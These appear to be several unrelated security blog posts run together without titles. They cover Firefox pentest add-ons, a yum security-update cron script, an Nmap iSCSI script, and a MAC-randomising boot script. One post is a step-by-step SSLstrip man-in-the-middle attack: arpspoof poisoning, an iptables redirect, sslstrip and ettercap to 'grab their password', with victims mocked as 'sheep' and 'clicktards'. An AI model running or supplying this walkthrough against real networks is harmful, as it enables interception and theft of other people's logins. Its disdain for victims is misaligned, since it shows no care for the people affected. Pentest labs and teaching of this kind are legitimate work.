AddnEdit Cookies: This add-on allows you to easily add, delete and edit cookies in your browser.  (http://addneditcookies.mozdev.org/) Unfortunately, the latest version does not support the newer Firefox 3, until the maintainer updates the package, I’ve edited the latest XPI to work with the latest versions of Firefox. A copy of it can be found here.

DT Whois – Allows quick domaintools.com lookups for the page you are looking at (http://www.beysim.net/dtwhois/)

Firebug – Allows you to read, debug and locally tweak HTML, Javascript and CSS right in Firefox (http://getfirebug.com/)

HackBar – The toolbar that tries to do it all! (http://devels-playground.blogspot.com/)

Leet Key – an add on that makes it trivial to convert text in various formats back and forth.  For example, URL Encode, Base64, Hex and even morse code. |\|347! (http://leetkey.mozdev.org/)

Live HTTP Headers – Allows you to watch, edit and replay HTTP requests (http://livehttpheaders.mozdev.org/)

SQL Inject Me, XSS Me, Access Me - Those are 3 separate add-ons from Seccom Labs that try to make it easy to test Sql Injection, XSS vulnerabilities and Access vulnerabilities. (http://labs.securitycompass.com/index.php/exploit-me/)

SwitchProxy Tool – If you find yourself switching from no proxy, to burp proxy to paros proxy, etc a lot then you will enjoy switch proxy. It will allow you to switch proxy settings with just a few clicks! (http://mozmonkey.com/switchproxy/)

Tamper Data – It will allow you to selectively intercept HTTP and HTTPS traffic and tamper with the requests via it’s nice user interface. It will let you tamper with http headers, post and get requests. (http://tamperdata.mozdev.org/)

Torbutton – If you need to hide behind Tor, it can be only a click away with Torbutton (https://www.torproject.org/torbutton/)

User Agent Switcher - Need to change your user-agent string in a jiffy? Want to look like a robot? User Agent Switcher is here for that! (http://chrispederick.com/work/user-agent-switcher/)

exploit-db Search – Lets you search the exploit-db database right in the firefox search box (https://addons.mozilla.org/en-US/firefox/addon/50241)

SecurityWire Search – Lets you search the top security sites on the web right in the Firefox search box. All sites in the index have been handpicked by the SecurityWire Team. (https://addons.mozilla.org/en-US/firefox/addon/58686)

For a listing and easy installation of all these  on the mozilla ad-ons site. simply follow this link: https://addons.mozilla.org/en-US/firefox/collection/pentesterstools

Hope you enjoy the add-ons, next post will be about general security add-ons for Firefox.

First you will need to install yum-security like this (as root or with sudo):

yum install yum-security

You can learn some more about yum-security here: http://magazine.redhat.com/2008/01/16/tips-and-tricks-yum-security/

Second, with your favorite text editor, you will want to create a script in /etc/cron.daily (to run the job daily) named “yum-update-security” with this content:


#!/bin/bash
yum update --security -y -d0 -q


Finally, once the script has been created make sure to give it execute permissions by running:

chmod +x /etc/cron.daily/yum-update-security

Then its a good idea to give it a spin by running it manually. ie:


/etc/cron.daily/yum-update-security


If the run is successful, the script should not output any text and  return to the command prompt after waiting a few seconds (or minutes if you are actually out of date on updates).

Ettercap was a very nice and easy way to sniff passwords and it still is for the most part. A recent issue has been the fact that the popular browsers have made their warnings about SSL certificates a little more scary. The old warnings looked harmless, the sheep would just click yes and the wolf would then have access to their paypal account. The newer warnings are a little more scary but from what I’ve seen aren’t much of a deterrent to the clicktards out there it will be rare that they know they’re being sniffed. When doing a pentest we want passwords of the network administrators not of the lowly sheep. Most network admins are at least a little security aware
Problem: Newer versions of popular webbrowsers have better warnings for SSL Certificate errors. This helps advanced users become aware that there may be a MITM attack going on. Most “clicktards” will ignore these warnings anyway and relinquish their logons to you but we want Network Admin passwords in our pentest.

Solution: Use SSL Strip. This will strip off all SSL information and pass the page to the victim as HTTP not HTTPS so no warning and only the most astute and paranoid users will notice this.

My lab is as follows. BackTrack 4 live and a windows XP machine which will be my victim.

Here is what I did step by step in BT4 Live boot to get this to work.

1. Start networking on BT4

 /etc/init.d/networking start

2. Enable ipv4 forewarding

 echo “1″ > /proc/sys/net/ipv4/ip_forward

3. Create an iptables rule to foreward traffic destined for port 80 to the port used by sslstrip which is 10000 by default
 
 iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

4. Now we need to start arpspoof to poision the victims arptable
 
 arpspoof -i eth0 -t <Victims IP Address> <The Gateways IP Address>

5. now we start sslstrip with the -a switch
 
 sslstrip -a

6. next we need to start ettercap
 
 ettercap -T -q -i eth0

7. wait for someone to logon and grab their password!!

A copy of the script can be downloaded from http://www.securitywire.com/nse/iscsi-enum-targets.nse

To use the script, it needs to be copied to your NMAP scripts folder (that would be /usr/share/nmap/scripts/ on many installations). After copying the script to the proper location, you need to run “nmap –script-updatedb” for NMAP to reload it’s script table and be aware of the new script.

Here is an example output of the script:

$ nmap -sC localhost -p 3260

Starting Nmap 5.00 ( http://nmap.org ) at 2009-10-10 09:29 EDT
Interesting ports on localhost (127.0.0.1):
PORT     STATE SERVICE
3260/tcp open  iscsi
|  iscsi-enum-targets: iSCSI Targets found
|  TargetName=iqn.2009-10.com.securitywire:storage.lun2
|  TargetAddress=127.0.0.1:3260,1
|  TargetName=iqn.2009-10.com.securitywire:storage.lun1
|_ TargetAddress=127.0.0.1:3260,1

Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds

I only have limited resources to test the script, I would be interested to hear how it works out across a wide variety of iSCSI targets.

Macchanger has an option “-r” that randomly picks a mac address for you.  Out of 5 minutes boredom and lack of internet connectivity, I decided to make use of this functionality on my beloved asus eeepc pentest toy by writting a small boot up script that detects all attached network devices and randomize their mac address on boot. This laptop runs Backtrack 4 which leaves all the interface in a down mode on boot up; therefore, it was as simple as adding a little script to the /etc/rc.local file to randomize all the MAC address on boot. The script is as follows:

for IFACE in $(ifconfig -a -s | egrep -v "^(lo|Iface)" | cut -f 1 -d" ")
do
        macchanger -r $IFACE
done

Thats it! With this 4 liner, your machine will now get random mac addresses every time it boots up. One caveat is that if you add a new device after boot, it will obviously not work for that new device’s mac address. Also if you are under a distribution that does put the network interface in “UP” mode on boot, like most distributions; then you will want to make sure the code runs before your network scripts. Last but not least, if you do not have macchanger already installed, on a debian based distro you can simply install it by running “sudo apt-get install macchanger”; for other systems, simply visit the macchanger web site for more information.